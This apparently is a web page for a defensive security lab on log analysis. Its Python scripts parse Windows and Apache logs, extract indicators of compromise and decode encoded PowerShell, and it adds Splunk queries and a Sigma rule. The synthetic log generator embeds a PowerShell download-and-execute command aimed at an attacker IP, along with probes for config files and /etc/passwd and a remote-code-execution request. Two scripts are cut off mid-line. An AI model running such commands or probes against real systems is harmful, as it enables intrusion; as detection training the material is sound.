0 / 11 steps complete
Intermediate AI-Assisted Log Analysis

L17: Log Analysis & Automated IOC Extraction

Parse Windows EVTX, Linux syslog, Apache access logs, and firewall logs using Python on SIFT Workstation. Automate IOC extraction with regex and NLP, correlate events across log sources, and feed results into your Splunk detection pipeline.

Python 3 python-evtx Splunk SIFT Workstation pandas regex
Phase 1: Log Collection & Parsing
1 Set up log analysis environment on SIFT
# Install the third-party packages used in this lab.
# ipaddress is part of the Python 3 standard library, so it is not installed
# from PyPI; lxml is imported directly by parse_evtx.py in the next step.
pip3 install python-evtx pandas matplotlib lxml

# -p keeps the setup idempotent when the lab is re-run.
mkdir -p ~/log-lab && cd ~/log-lab
mkdir -p logs iocs reports

# Generate synthetic log data for practice
cat > generate_logs.py << 'EOF'
"""Generate synthetic Windows event and Apache access logs for this lab.

Outputs (relative to the current directory):
  logs/windows_events.txt  pipe-delimited rows:
                           time|event_id|user|workstation|source_ip
                           (injected attacker rows carry a sixth field
                           holding the command line / task description)
  logs/apache_access.log   Apache-style access lines plus a few attack requests
"""
import base64
import datetime
import os
import random

BASE_TIME = datetime.datetime(2024, 3, 1, 8, 0, 0)
SECONDS_PER_DAY = 86400
ATTACKER_IP = "185.234.219.44"
APACHE_TIME_FMT = "%d/%b/%Y:%H:%M:%S +0000"

# PowerShell's -EncodedCommand takes base64 over UTF-16LE text. Emitting a
# real encoded string (instead of a literal placeholder containing brackets)
# means the base64 regexes used by the extractor and decoder scripts can
# actually match it and the decoder has something to decode.
PS_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString("
    f"'http://{ATTACKER_IP}/update.ps1')"
)
ENCODED_PAYLOAD = base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode("ascii")


def random_time():
    """Return a random timestamp within 24 hours after BASE_TIME."""
    offset = random.randint(0, SECONDS_PER_DAY)
    return BASE_TIME + datetime.timedelta(seconds=offset)


def build_windows_events():
    """Return a list of pipe-delimited event lines (benign plus injected)."""
    # --- Windows Security EVTX (simulated CSV) ---
    users = ['alice', 'bob', 'svc_backup', 'SYSTEM', 'admin']
    event_ids = [4624, 4625, 4672, 4688, 4648, 4698, 7045, 4104]
    weights = [50, 10, 5, 20, 3, 2, 1, 1]

    events = []
    for _ in range(2000):
        t = random_time()
        user = random.choice(users)
        eid = random.choices(event_ids, weights=weights)[0]
        events.append(f"{t.isoformat()}|{eid}|{user}|WS{random.randint(1,20):02d}|"
                      f"192.168.56.{random.randint(10,50)}\n")

    # Inject malicious events: an encoded PowerShell launch and a scheduled
    # task creation sharing one timestamp in the 22:00 hour.
    for _ in range(30):
        t = datetime.datetime(2024, 3, 1, 22,
                              random.randint(0, 59), random.randint(0, 59))
        events.append(f"{t.isoformat()}|4688|admin|WS01|192.168.56.10|"
                      f"cmd.exe /c powershell -enc {ENCODED_PAYLOAD}\n")
        events.append(f"{t.isoformat()}|4698|admin|WS01|192.168.56.10|"
                      f"New scheduled task: WindowsUpdate\n")
    return events


def write_windows_events(path):
    """Write the shuffled Windows event lines to *path*."""
    events = build_windows_events()
    # Shuffle so the injected rows are not grouped at the end of the file.
    random.shuffle(events)
    with open(path, 'w') as f:
        f.writelines(events)


def write_apache_log(path):
    """Write 500 benign requests followed by the attack requests to *path*."""
    # --- Apache access log ---
    attacks = [
        'GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',
        'GET /.env HTTP/1.1',
        'GET /etc/passwd HTTP/1.1',
        'POST /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array',
    ]

    lines = []
    for _ in range(500):
        stamp = random_time().strftime(APACHE_TIME_FMT)
        ip = f"192.168.1.{random.randint(1,254)}"
        status = random.choices([200, 304, 404, 500], [60, 20, 15, 5])[0]
        lines.append(f'{ip} - - [{stamp}] '
                     f'"GET /page{random.randint(1,20)}.html HTTP/1.1" '
                     f'{status} {random.randint(500,50000)}\n')

    # Inject attacks, all stamped with BASE_TIME and a single source IP.
    attack_stamp = BASE_TIME.strftime(APACHE_TIME_FMT)
    for attack in attacks:
        lines.append(f'{ATTACKER_IP} - - [{attack_stamp}] "{attack}" 200 512\n')

    with open(path, 'w') as f:
        f.writelines(lines)


def main():
    # Create the output directory so the script also works when run on its own.
    os.makedirs('logs', exist_ok=True)
    write_windows_events('logs/windows_events.txt')
    write_apache_log('logs/apache_access.log')
    print("Synthetic logs generated in logs/")


if __name__ == '__main__':
    main()
EOF
python3 generate_logs.py
2 Parse Windows EVTX files with python-evtx
cat > ~/log-lab/parse_evtx.py << 'EOF'
"""Parse Windows event logs into logs/parsed_events.csv.

Reads every logs/*.evtx file with python-evtx. When no EVTX file is present,
falls back to the pipe-delimited synthetic log logs/windows_events.txt.
"""
import glob
import json

import Evtx.Evtx as evtx
import pandas as pd
from lxml import etree

EVENT_NS = {'ns': 'http://schemas.microsoft.com/win/2004/08/events/event'}

# The synthetic log has five fields on ordinary rows and a sixth on the
# injected attacker rows (command line / task description). Naming all six
# keeps those rows from being rejected by on_bad_lines='skip'; rows with only
# five fields get NaN in 'details'.
SYNTHETIC_COLUMNS = ['time', 'event_id', 'user', 'workstation',
                     'source_ip', 'details']


def record_to_row(record):
    """Convert one python-evtx record into a flat dict of selected fields."""
    xml = etree.fromstring(record.xml())
    system = xml.find('ns:System', EVENT_NS)
    eid = system.findtext('ns:EventID', namespaces=EVENT_NS)
    time_created = system.find('ns:TimeCreated', EVENT_NS)
    time = time_created.get('SystemTime') if time_created is not None else ''
    computer = system.findtext('ns:Computer', namespaces=EVENT_NS, default='')

    # Collect the <EventData> children by their Name attribute; unnamed
    # children get a positional Data_<n> key.
    data = {}
    event_data = xml.find('ns:EventData', EVENT_NS)
    if event_data is not None:
        for item in event_data:
            name = item.get('Name', f'Data_{len(data)}')
            data[name] = item.text or ''

    return {
        'time': time,
        'event_id': eid,
        'computer': computer,
        'subject_user': data.get('SubjectUserName', ''),
        'target_user': data.get('TargetUserName', ''),
        'logon_type': data.get('LogonType', ''),
        'process_name': data.get('NewProcessName', ''),
        'command_line': data.get('CommandLine', ''),
        'source_ip': data.get('IpAddress', data.get('WorkstationName', '')),
        'raw_data': json.dumps(data),
    }


def parse_evtx_file(evtx_path):
    """Return a DataFrame with one row per record parsed from *evtx_path*.

    Records that fail to parse are skipped (best effort), but the number
    skipped is reported instead of being silently discarded.
    """
    records = []
    skipped = 0
    with evtx.Evtx(evtx_path) as log:
        for record in log.records():
            try:
                records.append(record_to_row(record))
            except Exception:
                # A single corrupt record should not abort the whole file.
                skipped += 1
    if skipped:
        print(f"{evtx_path}: skipped {skipped} unparseable record(s)")
    return pd.DataFrame(records)


def load_events():
    """Load events from EVTX files, or from the synthetic log if none exist."""
    evtx_files = glob.glob('logs/*.evtx')
    if not evtx_files:
        print("No EVTX files found. Using synthetic log data instead.")
        # Parse the synthetic text-based log
        return pd.read_csv('logs/windows_events.txt', sep='|',
                           names=SYNTHETIC_COLUMNS, on_bad_lines='skip')
    # Process all EVTX files
    frames = [parse_evtx_file(path) for path in evtx_files]
    return pd.concat(frames, ignore_index=True)


def main():
    df = load_events()
    # An EVTX set that yields no records produces a frame without columns.
    if 'time' in df.columns:
        df['time'] = pd.to_datetime(df['time'], errors='coerce')
    print(f"Parsed {len(df)} events")
    if 'event_id' in df.columns:
        print(df.groupby('event_id').size().sort_values(ascending=False).head())
    df.to_csv('logs/parsed_events.csv', index=False)


if __name__ == '__main__':
    main()
EOF
python3 parse_evtx.py
Phase 2: IOC Extraction & Pattern Recognition
3 Build regex-based IOC extractor
cat > ~/log-lab/ioc_extractor.py << 'EOF'
"""Extract indicators of compromise (IOCs) from the lab's log files.

Scans logs/*.log, logs/*.txt and logs/*.csv with the regexes in PATTERNS,
prints a per-file summary, and writes the de-duplicated results to
iocs/extracted_iocs.json.
"""
import glob
import ipaddress
import json
import os
import re
from collections import defaultdict

# IOC regex patterns
PATTERNS = {
    'ipv4': re.compile(
        r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
        r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'),
    'ipv6': re.compile(
        r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'),
    'domain': re.compile(
        r'\b(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+'
        r'(?:com|net|org|io|ru|cn|tk|ml|info|biz|xyz|top|pw|ga|cf|gq)\b'),
    'url': re.compile(
        r'https?://[^\s"\'<>\]\)]+'),
    'md5': re.compile(r'\b[a-fA-F0-9]{32}\b'),
    'sha256': re.compile(r'\b[a-fA-F0-9]{64}\b'),
    # [A-Za-z], not [A-Z|a-z]: inside a character class '|' is a literal
    # pipe, which would otherwise be accepted as part of the TLD.
    'email': re.compile(
        r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'),
    # The single capture group is the encoded payload itself.
    'base64_cmd': re.compile(
        r'-enc(?:odedcommand)?\s+([A-Za-z0-9+/]{20,}={0,2})', re.IGNORECASE),
    'cve': re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE),
    # Word boundaries stop matches inside longer alphanumeric tokens.
    'mitre': re.compile(r'\bT\d{4}(?:\.\d{3})?\b'),
}

# Private IP ranges to filter
PRIVATE_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'),
]


def is_private(ip):
    """Return True if *ip* parses as an address inside PRIVATE_RANGES.

    Strings that are not valid IP addresses return False.
    """
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_RANGES)


def extract_iocs(text):
    """Return {ioc_type: sorted list of unique matches} found in *text*.

    Private IPv4 addresses are dropped. For patterns with a capture group
    (base64_cmd) the captured payload is stored rather than the whole match,
    so the '-enc' flag is not part of the recorded IOC. Types with no match
    are omitted from the result.
    """
    found = defaultdict(set)
    for ioc_type, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            # lastindex is None when the pattern has no capture group.
            value = match.group(match.lastindex or 0)
            if ioc_type == 'ipv4' and is_private(value):
                continue  # Filter private IPs
            found[ioc_type].add(value)
    # Sorted lists keep the printed sample and the JSON output stable
    # between runs.
    return {k: sorted(v) for k, v in found.items() if v}


def main():
    # Process log files
    log_files = (glob.glob('logs/*.log') + glob.glob('logs/*.txt')
                 + glob.glob('logs/*.csv'))
    all_iocs = defaultdict(set)
    for log_file in log_files:
        with open(log_file, encoding='utf-8', errors='ignore') as f:
            content = f.read()
        iocs = extract_iocs(content)
        print(f"\n{os.path.basename(log_file)}:")
        for ioc_type, values in iocs.items():
            print(f"  {ioc_type}: {len(values)} found")
            for v in values[:3]:
                print(f"    {v}")
            all_iocs[ioc_type].update(values)

    # Save results
    os.makedirs('iocs', exist_ok=True)
    with open('iocs/extracted_iocs.json', 'w') as f:
        json.dump({k: sorted(v) for k, v in all_iocs.items()}, f, indent=2)

    print("\nTotal unique IOCs extracted:")
    for ioc_type, values in all_iocs.items():
        print(f"  {ioc_type}: {len(values)}")


if __name__ == '__main__':
    main()
EOF
python3 ioc_extractor.py
4 Decode PowerShell encoded commands
cat > ~/log-lab/decode_powershell.py << 'EOF'
"""Find PowerShell activity in the Windows log and decode -EncodedCommand."""
import base64
import binascii
import re

# Matches -enc / -EncodedCommand followed by a base64 payload (captured).
ENCODED_RE = re.compile(
    r'-enc(?:odedcommand)?\s+([A-Za-z0-9+/]{20,}={0,2})', re.IGNORECASE)


def decode_ps_encoded(encoded_str):
    """Decode PowerShell -EncodedCommand (UTF-16LE base64).

    Returns the decoded text. If the bytes are not valid UTF-16LE they are
    decoded as UTF-8 with replacement characters; if the input is not valid
    base64 at all, a "[Decode error: ...]" string is returned.
    """
    # Pad to a multiple of four; -len % 4 is 0 when no padding is needed.
    padded = encoded_str + '=' * (-len(encoded_str) % 4)
    try:
        raw = base64.b64decode(padded)
    except (binascii.Error, ValueError) as e:
        return f"[Decode error: {e}]"
    try:
        return raw.decode('utf-16-le')
    except UnicodeDecodeError:
        # Try standard base64 text
        return raw.decode('utf-8', errors='replace')


def analyze_powershell_line(line, max_depth=3):
    """Analyze a PowerShell command for suspicious patterns.

    Returns (indicators, decoded_cmds): a list of human-readable indicator
    strings and a list of decoded -EncodedCommand payloads. Decoded payloads
    are analyzed recursively, up to *max_depth* nested levels, so a payload
    that itself launches an encoded command is also reported.
    """
    line_lower = line.lower()
    indicators = []

    # Suspicious patterns
    if re.search(r'-enc(?:odedcommand)?', line_lower):
        indicators.append("EncodedCommand — obfuscation technique")
    if 'iex' in line_lower or 'invoke-expression' in line_lower:
        indicators.append("IEX/Invoke-Expression — code injection")
    if 'downloadstring' in line_lower or 'downloadfile' in line_lower:
        indicators.append("Download from internet")
    if 'net.webclient' in line_lower or 'invoke-webrequest' in line_lower:
        indicators.append("Network download client")
    if 'bypass' in line_lower:
        indicators.append("ExecutionPolicy Bypass")
    if 'hidden' in line_lower:
        indicators.append("Hidden window")
    if 'mimikatz' in line_lower:
        indicators.append("Mimikatz reference")
    if re.search(r'\$env:temp', line_lower):
        indicators.append("Writing to TEMP directory")

    # Extract and decode encoded segments
    decoded_cmds = []
    for payload in ENCODED_RE.findall(line):
        decoded = decode_ps_encoded(payload)
        decoded_cmds.append(decoded)
        if max_depth > 0:
            # The recursive call returns a (indicators, decoded) pair; merge
            # each half into its own list rather than extending with the tuple.
            nested_indicators, nested_decoded = analyze_powershell_line(
                decoded, max_depth - 1)
            indicators.extend(nested_indicators)
            decoded_cmds.extend(nested_decoded)
    return indicators, decoded_cmds


def main():
    # Read logs and find PowerShell
    with open('logs/windows_events.txt', errors='ignore') as f:
        content = f.read()

    ps_lines = [line for line in content.split('\n')
                if 'powershell' in line.lower()]
    print(f"Found {len(ps_lines)} PowerShell-related log entries\n")

    # Only the first ten entries are printed to keep the output readable.
    for line in ps_lines[:10]:
        indicators, decoded = analyze_powershell_line(line)
        if indicators:
            print("[!] Suspicious PowerShell:")
            print(f"    {line[:120]}")
            for ind in indicators:
                print(f"    → {ind}")
            for d in decoded:
                print(f"    DECODED: {d[:200]}")
            print()


if __name__ == '__main__':
    main()
EOF
python3 decode_powershell.py
5 Analyze Apache logs for web attack patterns
cat > ~/log-lab/apache_analyzer.py << 'EOF' import re, pandas as pd from collections import Counter APACHE_PATTERN = re.compile( r'(?P\d+\.\d+\.\d+\.\d+) .+ \[(?P
Phase 3: Cross-Source Correlation
6 Correlate IOCs across log sources
cat > ~/log-lab/correlate_logs.py << 'EOF'
"""Correlate parsed Windows events with IPs flagged in other log sources.

Inputs:
  logs/parsed_events.csv       parsed Windows events
  iocs/extracted_iocs.json     extracted IOCs (the 'ipv4' list is used)
  iocs/web_attacker_ips.txt    optional, one IP per line
"""
import json

import pandas as pd

# Process creation, scheduled task, PowerShell script block, service install
SUSPICIOUS_EIDS = [4688, 4698, 4104, 7045]


def load_ip_file(path):
    """Return the set of non-blank lines in *path*, or an empty set if absent."""
    try:
        with open(path) as f:
            # Skip blank lines so '' never ends up in the lookup set.
            return {line.strip() for line in f if line.strip()}
    except FileNotFoundError:
        return set()


def first_present(columns, candidates):
    """Return the first name in *candidates* that is in *columns*, else None."""
    for name in candidates:
        if name in columns:
            return name
    return None


# Load all parsed log sources
windows_df = pd.read_csv('logs/parsed_events.csv', on_bad_lines='skip')
if 'time' in windows_df.columns:
    windows_df['time'] = pd.to_datetime(windows_df['time'], errors='coerce')
else:
    windows_df['time'] = pd.NaT
windows_df['source'] = 'Windows'

# Load extracted IOCs
with open('iocs/extracted_iocs.json') as f:
    iocs = json.load(f)
malicious_ips = set(iocs.get('ipv4', []))

# Cross-source correlation: find IPs that appear in BOTH Apache attacks AND Windows events
web_attacker_ips = load_ip_file('iocs/web_attacker_ips.txt')

# Find Windows events from known-bad IPs
ip_col = first_present(windows_df.columns,
                       ['source_ip', 'IpAddress', 'workstation'])

if ip_col and web_attacker_ips:
    correlated = windows_df[windows_df[ip_col].isin(web_attacker_ips)]
    print(f"Windows events from web attacker IPs: {len(correlated)}")
    if not correlated.empty:
        print("\n[!] Correlation found — web attacker has Windows activity!")
        # Build the display list from columns that exist, without repeating
        # the IP column when there is no 'user' column.
        display_cols = [c for c in ('time', ip_col, 'event_id', 'user')
                        if c in correlated.columns]
        print(correlated[display_cols].head(10))
else:
    print("Correlation: loading synthesized data")
    print("In production, this would join firewall, web, and endpoint logs by IP")

# Also check the public IPv4 addresses pulled out by the IOC extractor.
if ip_col and malicious_ips:
    ioc_hits = windows_df[windows_df[ip_col].isin(malicious_ips)]
    print(f"Windows events from extracted IOC IPs: {len(ioc_hits)}")

# Timeline correlation: find suspicious sequences
if 'event_id' in windows_df.columns:
    # Compare numerically so IDs read as int, float or str all match.
    event_ids = pd.to_numeric(windows_df['event_id'], errors='coerce')
    suspicious = windows_df[event_ids.isin(SUSPICIOUS_EIDS)]
    print(f"\nSuspicious event types: {len(suspicious)}")
    print(suspicious.groupby('event_id').size())
EOF
python3 correlate_logs.py
7 Parse Linux syslog for suspicious authentication
# Analyze /var/log/auth.log for SSH brute force and privilege escalation cat > ~/log-lab/syslog_analyzer.py << 'EOF' import re, pandas as pd from collections import defaultdict # Parse auth.log AUTH_PATTERN = re.compile( r'(?P\w+)\s+(?P\d+)\s+(?P
Phase 4: Splunk Integration & Reporting
8 Build Splunk SPL queries for detected patterns
# Splunk SPL query for encoded PowerShell detection
# The rex names its capture group "encoded" because the following where/eval
# stages reference that field; (?i) makes it case-insensitive like the search.
# NOTE(review): base64decode() may not be available as an eval function on
# every Splunk deployment — confirm, or substitute your decoding app/macro.
index=wineventlog EventCode=4688 (CommandLine="*-enc*" OR CommandLine="*-EncodedCommand*")
| rex field=CommandLine "(?i)-enc(?:odedcommand)?\s+(?P<encoded>[A-Za-z0-9+/]{20,}={0,2})"
| where isnotnull(encoded)
| eval decoded=base64decode(encoded)
| table _time, ComputerName, SubjectUserName, CommandLine, decoded
| sort -_time

# Scheduled task creation (T1053.005)
index=wineventlog EventCode=4698
| table _time, ComputerName, SubjectUserName, TaskName, TaskContent
| sort -_time

# SSH brute force from Linux auth logs
# Bucket events into 5-minute windows with bin before counting per source IP.
index=linux_secure "Failed password"
| rex "from (?P<src_ip>\d+\.\d+\.\d+\.\d+)"
| bin _time span=5m
| stats count as failures by src_ip, _time
| where failures >= 10
| sort -failures

# Apache web attacks
# "*../*" matches any request containing a parent-directory step.
index=apache_access (uri="*../*" OR uri="*/.env*" OR uri="*/etc/passwd*" OR uri="*union*select*")
| rex "(?P<attack_ip>\d+\.\d+\.\d+\.\d+).+\"(?P<method>\w+) (?P<uri>[^ ]+)"
| stats count by attack_ip, method
| sort -count
9 Export IOCs and generate Sigma detection rules
cat > ~/log-lab/sigma_ps_encoded.yml << 'EOF'
title: PowerShell EncodedCommand Execution
id: f62b4d71-abda-4c0d-b378-f9f5f5f9cf61
# Sigma status must be one of: stable, test, experimental, deprecated,
# unsupported. A lab rule that has not been tuned yet is experimental.
status: experimental
description: Detects PowerShell execution with -EncodedCommand parameter (T1059.001)
author: CyberSec Pro Academy - L17
# The detection below uses raw Security-log fields (EventID 4688,
# NewProcessName), so the log source is the Windows Security channel.
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4688
        NewProcessName|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-enc '
            - '-EncodedCommand '
            - '-e '
    filter_legitimate:
        CommandLine|contains:
            - 'C:\\Program Files\\PowerShell'
            - 'Microsoft.Exchange'
    condition: selection and not filter_legitimate
falsepositives:
    - Legitimate software using encoded commands (SCCM, Exchange)
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.defense-evasion
    - attack.t1027
EOF
echo "Sigma rule created"
10 Map all findings to MITRE ATT&CK
Detection | Log Source | ATT&CK Technique
Encoded PowerShell | Windows 4688 | T1059.001 + T1027
Scheduled task creation | Windows 4698 | T1053.005 — Persistence
SSH brute force | Linux auth.log | T1110.001 — Password Guessing
Path traversal attempt | Apache access.log | T1083 — File and Directory Discovery
.env file probe | Apache access.log | T1552.001 — Credentials In Files
New service install | Windows 7045 | T1543.003 — Windows Service
11 Document findings and produce log analysis report

Lab Findings

Metric | Value
Log sources analyzed
Total events parsed
IOCs extracted (total)
Encoded PS commands found
Web attacker IPs
SSH brute force sources

Next: Lab L18 — YARA Rule Writing with AI

Write and test YARA rules to detect malware families using AI-guided pattern identification.

Start L18 →
AI Log Analysis Expert

Enter your Anthropic API key to activate the AI analyst:

Quick Prompts: